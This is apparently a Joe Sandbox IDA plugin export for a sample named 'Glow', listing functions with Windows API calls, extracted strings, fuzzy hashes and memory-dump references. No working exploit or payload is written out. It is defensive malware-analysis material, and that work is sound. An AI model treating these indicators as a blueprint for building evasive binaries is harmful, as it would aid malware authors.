Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31dfff158d0183711555335d4a1a03e6ed72202dd3a4b8f76913e202524f8b5e
Instruction ID: 462a8da63caf194ee8566974efac3802d12b2a333b04257d0542656c856d3be8
Opcode Fuzzy Hash: 31dfff158d0183711555335d4a1a03e6ed72202dd3a4b8f76913e202524f8b5e
Instruction Fuzzy Hash: C901A2B260921A7EF62236786CC0FE7670DDF413BCB314729B721A55D1DA608C408264

Function 003E2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 003E2394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E23A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E23BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E23D7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3f973db48d31d4630d1e325090f4b90e578fad9e39b5ee7d0ac3da11c590d0d0
Instruction ID: 6ad37cff5e47cf7b71ca3a428b376f99803aa174699e5c154f3dc13bbb6324db
Opcode Fuzzy Hash: 3f973db48d31d4630d1e325090f4b90e578fad9e39b5ee7d0ac3da11c590d0d0
Instruction Fuzzy Hash: 7011097A900228FFEB119BA5CD85F9EBB78FB08750F210191EA01B7290D7716E10DB94

Function 003EEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 003EEB14
MessageBoxW.USER32(?,?,?,?), ref: 003EEB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003EEB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003EEB64

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 12f88db02a8dc4e4519ed436ed83b6889a6bec5b0ae36b0cefd46e4d12d3612f
Instruction ID: db5ad8a6cc70fdee6d1a9839c3657ff4a041abfbb74b53fdab8935e7401ddb23
Opcode Fuzzy Hash: 12f88db02a8dc4e4519ed436ed83b6889a6bec5b0ae36b0cefd46e4d12d3612f
Instruction Fuzzy Hash: BC1108B2D04279BBC7029FB89C05ADA7FACAB46311F018326F815D32D1D6B4C9048764

Function 003AD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,003AD369,00000000,00000004,00000000), ref: 003AD588
GetLastError.KERNEL32 ref: 003AD594
__dosmaperr.LIBCMT ref: 003AD59B
ResumeThread.KERNEL32(00000000), ref: 003AD5B9

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: d0379268af2f671a9975a6e7c109d3d2b8eb73e5fd3f33784a5e0233b638ceac
Instruction ID: 851785ecd6b0f42fca12db3df9d4e56363c2c401a59da3011ef0d618a7f2979c
Opcode Fuzzy Hash: d0379268af2f671a9975a6e7c109d3d2b8eb73e5fd3f33784a5e0233b638ceac
Instruction Fuzzy Hash: D4019676C041147BDB126FA5DC09BAA7B69EF47735F114225F9268A5E0DF708900C6A1

Function 00387873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003878B1
GetStockObject.GDI32(00000011), ref: 003878C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 003878CF

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 3a41b260b8003169d930872ee518cea9cae44a0ae6890e9ef9e20dceffb87f13
Instruction ID: 444ab0d67dfa5896aa1ad1e71f2e8a33a9358d414b32ba13779c92c760c56762
Opcode Fuzzy Hash: 3a41b260b8003169d930872ee518cea9cae44a0ae6890e9ef9e20dceffb87f13
Instruction Fuzzy Hash: 53118BB2905248BFDF026F90CC59EEA7B6AFF08364F154126FA1052160D731DC60EBA1

Function 003B33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,003B338D,00000364,00000000,00000000,00000000,?,003B35FE,00000006,FlsSetValue), ref: 003B3418
GetLastError.KERNEL32(?,003B338D,00000364,00000000,00000000,00000000,?,003B35FE,00000006,FlsSetValue,00423260,FlsSetValue,00000000,00000364,?,003B31B9), ref: 003B3424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003B338D,00000364,00000000,00000000,00000000,?,003B35FE,00000006,FlsSetValue,00423260,FlsSetValue,00000000), ref: 003B3432

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: d2881cf1b7f0e896af76f62c2440bd2805c82abf748964df450532c48b88c8f5
Instruction ID: 22c47f439c391b19fc716bffd247f116fea26ada992ebe9214c1cc172e9c68ed
Opcode Fuzzy Hash: d2881cf1b7f0e896af76f62c2440bd2805c82abf748964df450532c48b88c8f5
Instruction Fuzzy Hash: 2801F776A11232ABCB234B7A9C44AD77B58BF44B657624230FB16D3980CB30DE01C6E4

Function 003EBA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,003EB69A,?,00008000), ref: 003EBA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,003EB69A,?,00008000), ref: 003EBAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,003EB69A,?,00008000), ref: 003EBABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,003EB69A,?,00008000), ref: 003EBAED

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d344c5f28bc631005a91b5b483c09343ecfa3d447dfd641c906e86914ceb38ac
Instruction ID: 8c5c305c9900868bfbb98370af11e2498a74829634f26976a794fa88f24fcfa6
Opcode Fuzzy Hash: d344c5f28bc631005a91b5b483c09343ecfa3d447dfd641c906e86914ceb38ac
Instruction Fuzzy Hash: 4D115E71D00569E7CF02EFA6E9496EFFB78BF09711F1141A5D541B2180CB305650CBA9

Function 0041886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0041888E
ScreenToClient.USER32(?,?), ref: 004188A6
ScreenToClient.USER32(?,?), ref: 004188CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004188E5

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 2280ad6bdfff98689a3b658aece5f2c49b37693008a61e095c93190fa6f07c7d
Instruction ID: 79bb0c353357214307aa977bfdc771634d95fc08ae741505da39df9c425db5b9
Opcode Fuzzy Hash: 2280ad6bdfff98689a3b658aece5f2c49b37693008a61e095c93190fa6f07c7d
Instruction Fuzzy Hash: 2D1112B9D00209EFDB41DFA8C884AEEBBF5FB08314F508166E915E3210D735AA95DF54

Function 003E36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003E3712
GetWindowThreadProcessId.USER32(?,00000000), ref: 003E3723
GetCurrentThreadId.KERNEL32 ref: 003E372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003E3731

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b73a3c5dae2dc41e4919fb50276c542b0597daad3738e242240aa037e4461e1f
Instruction ID: 6ee9e63f56908e775c0179c91b000f465a9835f03a977b53edef5175d0fcf140
Opcode Fuzzy Hash: b73a3c5dae2dc41e4919fb50276c542b0597daad3738e242240aa037e4461e1f
Instruction Fuzzy Hash: 75E092F19012747BDB2017A39C4DEEB7F6CDF42BA1F004125F105D20C0DAA4C940C2B1

Function 004192BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00381F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00381F87
Part of subcall function 00381F2D: SelectObject.GDI32(?,00000000), ref: 00381F96
Part of subcall function 00381F2D: BeginPath.GDI32(?), ref: 00381FAD
Part of subcall function 00381F2D: SelectObject.GDI32(?,00000000), ref: 00381FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 004192E3
LineTo.GDI32(?,?,?), ref: 004192F0
EndPath.GDI32(?), ref: 00419300
StrokePath.GDI32(?), ref: 0041930E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 71a41632467bc6532dd2ed8280880a0b5b7475266684d659f951902d0883813d
Instruction ID: 9b798a30be21266157c5428e711813e4bd07de381d83fde930515f6e436e5bc2
Opcode Fuzzy Hash: 71a41632467bc6532dd2ed8280880a0b5b7475266684d659f951902d0883813d
Instruction Fuzzy Hash: 6BF0BE72101228BBDB122F50AC0EFCE3F59AF0E324F048011FA11211E2C3B895628BED

Function 003821A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 003821BC
SetTextColor.GDI32(?,?), ref: 003821C6
SetBkMode.GDI32(?,00000001), ref: 003821D9
GetStockObject.GDI32(00000005), ref: 003821E1

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 31d3cd50848a74925205a2d3eaf3503193e7fcd14bd5115ade3ef9d254178868
Instruction ID: fd5df4f4779ec3a7fba752b85936bbb00b0b0687a6d947d37567aee42641d63a
Opcode Fuzzy Hash: 31d3cd50848a74925205a2d3eaf3503193e7fcd14bd5115ade3ef9d254178868
Instruction Fuzzy Hash: DEE06571640640BADB215F74AC09BE93B11AB16335F14C229F7F6940E1C77246409B15

Function 003DEC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 003DEC36
GetDC.USER32(00000000), ref: 003DEC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 003DEC60
ReleaseDC.USER32(?), ref: 003DEC81

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b344cfe2116c9dc5379b921b972609e82658ec45963e67958804be1aae8080ba
Instruction ID: 6a2cbcafa5301bcdc8dd70ed556a363f53b8c53a454dfbdf10dc5ec77e54487c
Opcode Fuzzy Hash: b344cfe2116c9dc5379b921b972609e82658ec45963e67958804be1aae8080ba
Instruction Fuzzy Hash: 7FE01AB1C00204DFCF41AFA0D908A9DBFB5EB08310F10C469E80AE7250C73859019F04

Function 003DEC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 003DEC4A
GetDC.USER32(00000000), ref: 003DEC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 003DEC60
ReleaseDC.USER32(?), ref: 003DEC81

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: cedcc0032a350797b1e4e0befa2407e71f17bc971ddab812019e987ce19884d3
Instruction ID: 4fd0c1241c51f007bafff168bbfcf55edce63c3d2cb3adfac060e34ce3215e1f
Opcode Fuzzy Hash: cedcc0032a350797b1e4e0befa2407e71f17bc971ddab812019e987ce19884d3
Instruction Fuzzy Hash: 19E012B0C00204EFCF41AFA0C808A9DBBB5AB08310B108469E80AE3250CB386A019F08

Function 003D3616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

bn>, xrefs: 003D3631, 003D38EA, 003D3903, 003D3B3F, 003D3B58
@COM_EVENTOBJ, xrefs: 003D3AD6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LoadString
String ID: @COM_EVENTOBJ$bn>
API String ID: 2948472770-3997017919
Opcode ID: ab7d48d96b15d67f36c6d0cd3b1d5ea58c7258dd825daa080f88cd6142f99993
Instruction ID: 5765bfdb4967196f77af68113a20de922170407f23cf1dbdb1311c4920957aa8
Opcode Fuzzy Hash: ab7d48d96b15d67f36c6d0cd3b1d5ea58c7258dd825daa080f88cd6142f99993
Instruction Fuzzy Hash: 38F16972A082009FD726DF14D881B6AB7E0BF84704F14895EF58A9B361D775EE49CB83

Function 004085DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 003A05B2: EnterCriticalSection.KERNEL32(0045170C,?,00000000,?,0038D22A,00453570,00000001,00000000,?,?,003FF023,?,?,00000000,00000001,?), ref: 003A05BD
Part of subcall function 003A05B2: LeaveCriticalSection.KERNEL32(0045170C,?,0038D22A,00453570,00000001,00000000,?,?,003FF023,?,?,00000000,00000001,?,00000001,00452430), ref: 003A05FA

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 003A0413: __onexit.LIBCMT ref: 003A0419

__Init_thread_footer.LIBCMT ref: 00408658

Part of subcall function 003A0568: EnterCriticalSection.KERNEL32(0045170C,00000000,?,0038D258,00453570,003C27C9,00000001,00000000,?,?,003FF023,?,?,00000000,00000001,?), ref: 003A0572
Part of subcall function 003A0568: LeaveCriticalSection.KERNEL32(0045170C,?,0038D258,00453570,003C27C9,00000001,00000000,?,?,003FF023,?,?,00000000,00000001,?,00000001), ref: 003A05A5

Strings

bn>, xrefs: 004085E5, 0040887F
Variable must be of type 'Object'., xrefs: 00408697

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: Variable must be of type 'Object'.$bn>
API String ID: 535116098-3159797878
Opcode ID: ff3958cf5a26f0aa33944e0a473e3fae980302d14975cc7c0eec6efb023c2f23
Instruction ID: 9ffd2446afcc68088244fad5a76598a71c7c89338a2af4eadad7da8d41949512
Opcode Fuzzy Hash: ff3958cf5a26f0aa33944e0a473e3fae980302d14975cc7c0eec6efb023c2f23
Instruction Fuzzy Hash: 9F918F74A00209EFCB04EF54D9819AEB7B1FF44304F50806EF946AB392DB75AE41CB59

Function 003F57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 003F5919

Strings

*, xrefs: 003F5855
LPT, xrefs: 003F5840

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 1c9d47b46705aed4f942efe74147db040c404d508a2c7078a97cf64b886c90b2
Instruction ID: e44f30d492c06d431dd0cae89970340f62d4870a62d40cd0498ad8b52f830769
Opcode Fuzzy Hash: 1c9d47b46705aed4f942efe74147db040c404d508a2c7078a97cf64b886c90b2
Instruction Fuzzy Hash: 68918E75A00608DFCB16DF54C4C4EAABBF5AF44304F198099EA499F362C775EE86CB90

Function 003E5703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 003E58AF

Strings

0$E, xrefs: 003E5952
Container, xrefs: 003E581E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ContainedObject
String ID: 0$E$Container
API String ID: 3565006973-1372137275
Opcode ID: 12ac26dc3c191d28c33ca4ea0097aa437e0ab9cbba33e696246a2b370491a237
Instruction ID: 2bbe060fdd31caabdd8191decefbda2586fa39960f17ff76ae0b381672fbb45c
Opcode Fuzzy Hash: 12ac26dc3c191d28c33ca4ea0097aa437e0ab9cbba33e696246a2b370491a237
Instruction Fuzzy Hash: 51815AB0600611EFDB15CF55C884AAABBF9FF49714F20856EF94A8B291DB70E841CB64

Function 003AE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003AE67D

Strings

pow, xrefs: 003AE655, 003AE672

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 379de13b9b5a5e8fac3ab5f2a2b9989115489003bd60f23a43bec9d8b8539b63
Instruction ID: 764b76224fbeb7c5398c0c7d316f37b7f30d4efc65f6e8e86d4675848454f434
Opcode Fuzzy Hash: 379de13b9b5a5e8fac3ab5f2a2b9989115489003bd60f23a43bec9d8b8539b63
Instruction Fuzzy Hash: 7751AD61F0A10296C713BB18DE013EA3BACEB51745F314D28F19186AF9DF358C86DA46

Function 0039A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0039A916

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
